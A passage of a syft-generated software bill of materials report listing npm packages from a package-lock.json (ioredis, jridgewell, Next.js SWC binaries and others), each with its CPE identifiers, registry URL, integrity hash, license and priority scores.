language: javascript
cpes:
- cpe: cpe:2.3:a:\@ioredis\/commands:\@ioredis\/commands:1.5.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40ioredis/commands@1.5.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@ioredis/commands/-/commands-1.5.1.tgz
integrity: sha512-JH8ZL/ywcJyR9MmJ5BNqZllXNZQqQbnVZOqpPQqE1vHiFgAw4NHbvE0FOduNU8IX9babitBT46571OnPTT0Zcw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2bd603d91182e49c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @isaacs/cliui 8.0.2'
title: '@isaacs/cliui 8.0.2'
description: 'Package discovered: @isaacs/cliui 8.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1157d16cad8b2ffc
name: '@isaacs/cliui'
version: 8.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@isaacs\/cliui:\@isaacs\/cliui:8.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40isaacs/cliui@8.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz
integrity: sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==
dependencies:
string-width: ^5.1.2
string-width-cjs: npm:string-width@^4.2.0
strip-ansi: ^7.0.1
strip-ansi-cjs: npm:strip-ansi@^6.0.1
wrap-ansi: ^8.1.0
wrap-ansi-cjs: npm:wrap-ansi@^7.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5c9bb2e998c9fa3b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @jridgewell/gen-mapping 0.3.13'
title: '@jridgewell/gen-mapping 0.3.13'
description: 'Package discovered: @jridgewell/gen-mapping 0.3.13'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 93582717df76767f
name: '@jridgewell/gen-mapping'
version: 0.3.13
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@jridgewell\/gen-mapping:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/gen-mapping:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/gen_mapping:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/gen_mapping:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/gen:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/gen:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40jridgewell/gen-mapping@0.3.13
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz
integrity: sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==
dependencies:
'@jridgewell/sourcemap-codec': ^1.5.0
'@jridgewell/trace-mapping': ^0.3.24
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 843924b3be64bc5f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @jridgewell/resolve-uri 3.1.2'
title: '@jridgewell/resolve-uri 3.1.2'
description: 'Package discovered: @jridgewell/resolve-uri 3.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 82452eb5459f3fba
name: '@jridgewell/resolve-uri'
version: 3.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@jridgewell\/resolve-uri:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/resolve-uri:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/resolve_uri:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/resolve_uri:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/resolve:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/resolve:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40jridgewell/resolve-uri@3.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz
integrity: sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c541a28057efb07d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @jridgewell/sourcemap-codec 1.5.5'
title: '@jridgewell/sourcemap-codec 1.5.5'
description: 'Package discovered: @jridgewell/sourcemap-codec 1.5.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 47804e8101ff9015
name: '@jridgewell/sourcemap-codec'
version: 1.5.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap-codec:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap-codec:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap_codec:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap_codec:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40jridgewell/sourcemap-codec@1.5.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz
integrity: sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 17f518740ec1a2d8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @jridgewell/trace-mapping 0.3.31'
title: '@jridgewell/trace-mapping 0.3.31'
description: 'Package discovered: @jridgewell/trace-mapping 0.3.31'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d2b0bb94bbc32d3e
name: '@jridgewell/trace-mapping'
version: 0.3.31
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@jridgewell\/trace-mapping:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/trace-mapping:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/trace_mapping:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/trace_mapping:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/trace:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@jridgewell\/trace:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40jridgewell/trace-mapping@0.3.31
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.31.tgz
integrity: sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw==
dependencies:
'@jridgewell/resolve-uri': ^3.1.0
'@jridgewell/sourcemap-codec': ^1.4.14
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 104bcdf3fd6a7ac2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @js-sdsl/ordered-map 4.4.2'
title: '@js-sdsl/ordered-map 4.4.2'
description: 'Package discovered: @js-sdsl/ordered-map 4.4.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 886fcbec7936d83f
name: '@js-sdsl/ordered-map'
version: 4.4.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@js-sdsl\/ordered-map:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@js-sdsl\/ordered-map:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@js_sdsl\/ordered_map:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@js_sdsl\/ordered_map:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@js-sdsl\/ordered:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@js-sdsl\/ordered:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@js_sdsl\/ordered:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@js_sdsl\/ordered:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@js:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@js:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40js-sdsl/ordered-map@4.4.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz
integrity: sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9fea893a2745b477
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @next/env 14.2.3'
title: '@next/env 14.2.3'
description: 'Package discovered: @next/env 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 18ad44792e37660e
name: '@next/env'
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@next\/env:\@next\/env:14.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40next/env@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@next/env/-/env-14.2.3.tgz
integrity: sha512-W7fd7IbkfmeeY2gXrzJYDx8D2lWKbVoTIj1o1ScPHNzvp30s1AuoEFSdr39bC5sjxJaxTtq3OTCZboNp0lNWHA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 258c6f6b4bc11247
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @next/swc-darwin-arm64 14.2.3'
title: '@next/swc-darwin-arm64 14.2.3'
description: 'Package discovered: @next/swc-darwin-arm64 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bdb25bdc1adfe20f
name: '@next/swc-darwin-arm64'
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@next\/swc-darwin-arm64:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-darwin-arm64:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_darwin_arm64:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_darwin_arm64:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40next/swc-darwin-arm64@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@next/swc-darwin-arm64/-/swc-darwin-arm64-14.2.3.tgz
integrity: sha512-3pEYo/RaGqPP0YzwnlmPN2puaF2WMLM3apt5jLW2fFdXD9+pqcoTzRk+iZsf8ta7+quAe4Q6Ms0nR0SFGFdS1A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 297b85bfc16e4adc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @next/swc-darwin-x64 14.2.3'
title: '@next/swc-darwin-x64 14.2.3'
description: 'Package discovered: @next/swc-darwin-x64 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b0a8be32ec095ef0
name: '@next/swc-darwin-x64'
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@next\/swc-darwin-x64:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-darwin-x64:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_darwin_x64:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_darwin_x64:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40next/swc-darwin-x64@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@next/swc-darwin-x64/-/swc-darwin-x64-14.2.3.tgz
integrity: sha512-6adp7waE6P1TYFSXpY366xwsOnEXM+y1kgRpjSRVI2CBDOcbRjsJ67Z6EgKIqWIue52d2q/Mx8g9MszARj8IEA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: eaf37f3f72892d80
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @next/swc-linux-arm64-gnu 14.2.3'
title: '@next/swc-linux-arm64-gnu 14.2.3'
description: 'Package discovered: @next/swc-linux-arm64-gnu 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b768ca89954904c7
name: '@next/swc-linux-arm64-gnu'
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64-gnu:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64-gnu:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64_gnu:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64_gnu:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40next/swc-linux-arm64-gnu@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@next/swc-linux-arm64-gnu/-/swc-linux-arm64-gnu-14.2.3.tgz
integrity: sha512-cuzCE/1G0ZSnTAHJPUT1rPgQx1w5tzSX7POXSLaS7w2nIUJUD+e25QoXD/hMfxbsT9rslEXugWypJMILBj/QsA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 27ac7498beafdc1b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @next/swc-linux-arm64-musl 14.2.3'
title: '@next/swc-linux-arm64-musl 14.2.3'
description: 'Package discovered: @next/swc-linux-arm64-musl 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f485e6463dfab8af
name: '@next/swc-linux-arm64-musl'
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64-musl:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64-musl:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64_musl:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64_musl:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40next/swc-linux-arm64-musl@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@next/swc-linux-arm64-musl/-/swc-linux-arm64-musl-14.2.3.tgz
